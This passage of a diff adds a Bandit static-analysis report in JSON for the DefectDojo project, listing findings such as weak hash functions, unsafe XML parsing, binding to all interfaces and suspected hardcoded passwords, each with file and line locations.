+ "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/acunetix/parser_helper.py", + "start_line": 24, + "end_line": 24, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B320", + "value": "B320" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/blackduck/parser.py:0103fabc08063f8578c7c57649e94b36171f79f5a8913fb7db684100eeeff624:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/blackduck/parser.py", + "start_line": 36, + "end_line": 37, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/bundler_audit/parser.py:1e8afbcd739b24028c1d2f46748066ffc7552104461abed802ad9712541d2763:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/bundler_audit/parser.py", + "start_line": 48, + "end_line": 48, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Using lxml.etree.parse to parse untrusted XML data is known to be vulnerable to XML attacks. Replace lxml.etree.parse with its defusedxml equivalent function.", + "cve": "dojo/tools/burp/parser.py:0c5fb6e0c48e4d929a0c216acb4269ab8a3d4ba31e1b84f5182bb1871b61cfb7:B320", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/burp/parser.py", + "start_line": 63, + "end_line": 63, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B320", + "value": "B320" + } + ] + }, + { + "category": "sast", + "message": "Using lxml.etree.fromstring to parse untrusted XML data is known to be vulnerable to XML attacks. Replace lxml.etree.fromstring with its defusedxml equivalent function.", + "cve": "dojo/tools/burp/parser.py:c793da06d0684b9744e5b2db1897581024e40511b62c5799c1248a70b85ccb53:B320", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/burp/parser.py", + "start_line": 70, + "end_line": 70, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B320", + "value": "B320" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/cobalt/parser.py:49b5550cea992e995fec56fc3656c028626cf23ed78f453f9dd3f8f8bb708335:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/cobalt/parser.py", + "start_line": 46, + "end_line": 46, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Possible binding to all interfaces.", + "cve": "dojo/tools/contrast/parser.py:201f2506423a7509b04958cb52cecef9b76c5643365c46e26eb78d38d4a13900:B104", + "severity": "Medium", + "confidence": "Medium", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/contrast/parser.py", + "start_line": 91, + "end_line": 91, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B104", + "value": "B104", + "url": "https://docs.openstack.org/bandit/latest/plugins/b104_hardcoded_bind_all_interfaces.html" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/contrast/parser.py:7e86a0ba581c320828d653b03fe5c75f220a7345ae706dd9fc125086224c08cb:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/contrast/parser.py", + "start_line": 33, + "end_line": 33, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/dawnscanner/parser.py:c25465d01d23706a581396e93a724f0f0b50df2d4030f3e1d59e72c1128f492a:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/dawnscanner/parser.py", + "start_line": 43, + "end_line": 43, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/dependency_check/parser.py:54c33ace789fc3d44625228b7ad4a9cfc8d27e85cca1d02660317b0e4f6af0ab:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/dependency_check/parser.py", + "start_line": 125, + "end_line": 125, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/generic/parser.py:0999f0165c8838b46df99da5f883da57e40cc8ed8eebecf31615b186f9a1154a:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/generic/parser.py", + "start_line": 338, + "end_line": 338, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/h1/parser.py:8024e53a017c99ccb251d2f70bcc3e60a033fd9f55306686de975d1b01b9bbec:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/h1/parser.py", + "start_line": 59, + "end_line": 59, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/ibm_app/parser.py:0acada6e436d14c9e6d62a4a0719a3e3684e2b4622ded796f5f5f5d4cbd61989:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/ibm_app/parser.py", + "start_line": 80, + "end_line": 80, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/immuniweb/parser.py:3cc6f6b411d3d6e162efb7a9bc710b473a689638a05b161eb40c7b0084af8ffc:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/immuniweb/parser.py", + "start_line": 62, + "end_line": 62, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/kiuwan/parser.py:4d04066e6857ecc8e5f5f428a7c4419817177ad950d1028b4e531bbf485cd487:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/kiuwan/parser.py", + "start_line": 83, + "end_line": 83, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/microfocus_webinspect/parser.py:eea6ab266612ed97736103a4bd4d62004e68889d509ac2ae3546ab47f8e9b7cf:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/microfocus_webinspect/parser.py", + "start_line": 70, + "end_line": 70, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/mozilla_observatory/parser.py:227fad54cd6a22727423321a2f00a1d9f2773da56236922b288a775b6ff614ed:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/mozilla_observatory/parser.py", + "start_line": 47, + "end_line": 47, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/nikto/parser.py:802632239706a7812580910732e8f09df3e34955060283397faf9dc3279b1889:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/nikto/parser.py", + "start_line": 59, + "end_line": 59, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Using lxml.etree.parse to parse untrusted XML data is known to be vulnerable to XML attacks. Replace lxml.etree.parse with its defusedxml equivalent function.", + "cve": "dojo/tools/nmap/parser.py:1d5dab23203edfe47cc3bb1516af3aeb54a4e54b16793d4dea24432250c3fe6a:B320", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/nmap/parser.py", + "start_line": 16, + "end_line": 16, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B320", + "value": "B320" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/openscap/parser.py:78ad2547f504d29e462b82784e77b8313397e91eac6645ea84d7d5e7ed934c15:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/openscap/parser.py", + "start_line": 64, + "end_line": 64, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/openvas_csv/parser.py:63bb9ca2bdadf712d2ff3a5dd39345e99873fe8ab0748cdb93b8c2dbad69d534:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/openvas_csv/parser.py", + "start_line": 339, + "end_line": 339, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Using lxml.etree.parse to parse untrusted XML data is known to be vulnerable to XML attacks. Replace lxml.etree.parse with its defusedxml equivalent function.", + "cve": "dojo/tools/qualys/parser.py:f4d36e5f17394f2eb1e261e90df78aa9a04db3ae7880bcc619c7ae838ac48d5a:B320", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/qualys/parser.py", + "start_line": 212, + "end_line": 212, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B320", + "value": "B320" + } + ] + }, + { + "category": "sast", + "message": "Using lxml.etree.parse to parse untrusted XML data is known to be vulnerable to XML attacks. Replace lxml.etree.parse with its defusedxml equivalent function.", + "cve": "dojo/tools/qualys_webapp/parser.py:4bc8bc8a3ea378ff4ae121c5a307efac025f3e590dda3550ab5aea1adf6da36e:B320", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/qualys_webapp/parser.py", + "start_line": 144, + "end_line": 144, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B320", + "value": "B320" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/retirejs/parser.py:75c8b1f94d79f55f50bc0defb71d386049cf6bb89fac6f411613fb2d86eea1ed:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/retirejs/parser.py", + "start_line": 45, + "end_line": 45, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Audit url open for permitted schemes. Allowing use of file:/ or custom schemes is often unexpected.", + "cve": "dojo/tools/safety/parser.py:d31826e17ae93489b9744de869d4e407304fe51f4c25fe5a1a272fd1bc14670c:B310", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/safety/parser.py", + "start_line": 11, + "end_line": 11, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B310", + "value": "B310" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/skf/parser.py:6169d2559920d062dbbe2717cb462c4ad8b82cf558ba16abe317d45302d1b568:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/skf/parser.py", + "start_line": 135, + "end_line": 135, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Using lxml.etree.parse to parse untrusted XML data is known to be vulnerable to XML attacks. Replace lxml.etree.parse with its defusedxml equivalent function.", + "cve": "dojo/tools/sonarqube/parser.py:19e9efc69a6b9013834977fd3f953646857a13369fb321ce42c04e30f9534672:B320", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/sonarqube/parser.py", + "start_line": 14, + "end_line": 14, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B320", + "value": "B320" + } + ] + }, + { + "category": "sast", + "message": "Using lxml.etree.fromstring to parse untrusted XML data is known to be vulnerable to XML attacks. Replace lxml.etree.fromstring with its defusedxml equivalent function.", + "cve": "dojo/tools/sonarqube_api/importer.py:dbe06ea0c7925d869fb9f24e452be6ced16e56aa414d3e7e81820ddaf46c94cc:B320", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/sonarqube_api/importer.py", + "start_line": 159, + "end_line": 159, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B320", + "value": "B320" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/sslscan/parser.py:d07e3f666f367b2d3bfdfff63549e8f999c7070f9eba408a3aabee18876eb60c:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/sslscan/parser.py", + "start_line": 52, + "end_line": 52, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/sslyze/parser.py:d07e3f666f367b2d3bfdfff63549e8f999c7070f9eba408a3aabee18876eb60c:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/sslyze/parser.py", + "start_line": 101, + "end_line": 101, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/testssl/parser.py:d07e3f666f367b2d3bfdfff63549e8f999c7070f9eba408a3aabee18876eb60c:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/testssl/parser.py", + "start_line": 57, + "end_line": 57, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/trufflehog/parser.py:eb8a35b1e8d290d29090630f165593a7507a4f8a6ac4e857ea5d38962b0ec340:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/trufflehog/parser.py", + "start_line": 40, + "end_line": 40, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/trustwave/parser.py:bd260e0162a79501cc8b2ef81745123d36363fc2d74c1b0cea4f07adfa530253:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/trustwave/parser.py", + "start_line": 178, + "end_line": 178, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/vcg/parser.py:ea3547b9aedbf2dd59d30565d48e05f1e1d663b4f25439b6d95d27eb68505d63:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/vcg/parser.py", + "start_line": 172, + "end_line": 172, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/vcg/parser.py:ea3547b9aedbf2dd59d30565d48e05f1e1d663b4f25439b6d95d27eb68505d63:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/vcg/parser.py", + "start_line": 112, + "end_line": 112, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/wapiti/parser.py:eea6ab266612ed97736103a4bd4d62004e68889d509ac2ae3546ab47f8e9b7cf:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/wapiti/parser.py", + "start_line": 63, + "end_line": 63, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/whitesource/parser.py:52cbbccfd7b77010f6c50b6ece5cc13b2ba7257ab48b8b35bba8757149365b47:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/whitesource/parser.py", + "start_line": 85, + "end_line": 85, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Use of insecure MD2, MD4, MD5, or SHA1 hash function.", + "cve": "dojo/tools/wpscan/parser.py:bc6b119fd1d8a48a663fb350ce9936813d44148315817875658848c0606b9d62:B303", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/tools/wpscan/parser.py", + "start_line": 54, + "end_line": 54, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B303", + "value": "B303" + } + ] + }, + { + "category": "sast", + "message": "Possible binding to all interfaces.", + "cve": "dojo/wsgi.py:8f83be41ce233ffdd3ba538f5cf8dcbc594351800eea73148308f607f57ee863:B104", + "severity": "Medium", + "confidence": "Medium", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/wsgi.py", + "start_line": 53, + "end_line": 53, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B104", + "value": "B104", + "url": "https://docs.openstack.org/bandit/latest/plugins/b104_hardcoded_bind_all_interfaces.html" + } + ] + }, + { + "category": "sast", + "message": "Using lxml.etree.parse to parse untrusted XML data is known to be vulnerable to XML attacks. Replace lxml.etree.parse with its defusedxml equivalent function.", + "cve": "tests/validate_acunetix_scan_xml.py:5624b9f257743c82ff40294c9a7660bb22731d7964a67a456200a713f03d34b4:B320", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "tests/validate_acunetix_scan_xml.py", + "start_line": 15, + "end_line": 15, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B320", + "value": "B320" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/benchmark/views.py:c988492d15a140a3b200ee45ef43f60934d984d5b90b035d160b2df9cdbf500d:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/benchmark/views.py", + "start_line": 26, + "end_line": 26, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/cred/views.py:bca9484e5547f64d3a0cc1a228028b87eaa866bfa32ed0e6f01e695d40348a24:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/cred/views.py", + "start_line": 602, + "end_line": 602, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/finding/views.py:ea88e3621f293029f0be0a07923f647c3f31929cac53117009219c0da3cb486e:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/finding/views.py", + "start_line": 1097, + "end_line": 1097, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/google_sheet/views.py:0d99d8da76a3f9f531a267e26ee81770b4e4cf9b69f329ed72738dee376e6a2e:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/google_sheet/views.py", + "start_line": 402, + "end_line": 402, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/google_sheet/views.py:7f3ea599070d54d4357e3c0a97a717ee2a63de9a0f56c489e7ce1e61555b155f:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/google_sheet/views.py", + "start_line": 312, + "end_line": 312, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.", + "cve": "dojo/middleware.py:134dadbf05483a5ef25ece4de17484c6d7ee52b1954640def46dcd811e987bf6:B101", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/middleware.py", + "start_line": 31, + "end_line": 36, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B101", + "value": "B101", + "url": "https://docs.openstack.org/bandit/latest/plugins/b101_assert_used.html" + } + ] + }, + { + "category": "sast", + "message": "Possible hardcoded password: 'Pass'", + "cve": "dojo/models.py:4728303944c6bbf8b9fa2df9f108f60d3ed619f32dd5484f6f70e23feee8f594:B105", + "severity": "Low", + "confidence": "Medium", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/models.py", + "start_line": 1822, + "end_line": 1822, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B105", + "value": "B105", + "url": "https://docs.openstack.org/bandit/latest/plugins/b105_hardcoded_password_string.html" + } + ] + }, + { + "category": "sast", + "message": "Possible hardcoded password: 'Fail'", + "cve": "dojo/models.py:b8547f6af0a7532068fd37deb8dc2c5b5e721ca91d52960b63a8f57344c4747b:B105", + "severity": "Low", + "confidence": "Medium", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/models.py", + "start_line": 1824, + "end_line": 1824, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B105", + "value": "B105", + "url": "https://docs.openstack.org/bandit/latest/plugins/b105_hardcoded_password_string.html" + } + ] + }, + { + "category": "sast", + "message": "Possible hardcoded password: 'POST'", + "cve": "dojo/okta.py:ed0865cc9fe7680777b1dc5425c2122ff86a77b4e35553e741e6c5c952c1d833:B105", + "severity": "Low", + "confidence": "Medium", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/okta.py", + "start_line": 69, + "end_line": 69, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B105", + "value": "B105", + "url": "https://docs.openstack.org/bandit/latest/plugins/b105_hardcoded_password_string.html" + } + ] + }, + { + "category": "sast", + "message": "Possible hardcoded password: 'POST'", + "cve": "dojo/okta.py:f5dca5b0a23106e19e0b7cc47bda0a13e1f5b37bac4a9cd9420874e290c9088d:B105", + "severity": "Low", + "confidence": "Medium", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/okta.py", + "start_line": 36, + "end_line": 36, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B105", + "value": "B105", + "url": "https://docs.openstack.org/bandit/latest/plugins/b105_hardcoded_password_string.html" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": "dojo/product/views.py:cf996664718e6b84aaa94f5e80ee016f29ffed64e074662d8a1d8267f0c77598:B110", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/product/views.py", + "start_line": 564, + "end_line": 564, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B110", + "value": "B110", + "url": "https://docs.openstack.org/bandit/latest/plugins/b110_try_except_pass.html" + } + ] + }, + { + "category": "sast", + "message": "Standard pseudo-random generators are not suitable for security/cryptographic purposes.", + "cve": "dojo/templatetags/display_tags.py:1ae99eae2ca3d9ad9478620b191075ca9fcb52db25824784b4a41ad03228c268:B311", + "severity": "Low", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 408, + "end_line": 408, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B311", + "value": "B311" + } + ] + }, + { + "category": "sast", + "message": "Try, Except, Pass detected.", + "cve": 